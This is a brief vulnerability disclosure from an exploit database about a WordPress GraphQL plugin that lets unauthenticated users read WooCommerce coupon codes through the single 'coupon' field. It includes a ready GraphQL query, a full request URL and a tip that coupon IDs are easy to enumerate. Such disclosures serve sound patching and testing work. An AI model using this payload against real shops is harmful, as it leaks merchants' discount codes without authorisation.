## https://sploitus.com/exploit?id=WPEX-ID:19138092-50D3-4D63-97C5-AA8E1CE39456
The vulnerability exists due to the plugin only preventing users from leaking coupons using the "coupons" aggregate field, and not the regular "coupon" field.
Given a valid coupon id, any unauthenticated user can make this GraphQL call and get the coupon code associated with it.
Please note that the coupon ids are in the format - base64(shop_coupon:x), where x is just a 2-3 digit integer and hence easy to enumerate.
query{
coupon(id:"c2hvcF9jb3Vwb246MTk="){
amount
code
}
}
Final URL should look like this: http://vulnerable-site.tld/graphql?query=query{coupon(id:"c2hvcF9jb3Vwb246MTIz"){amount code}}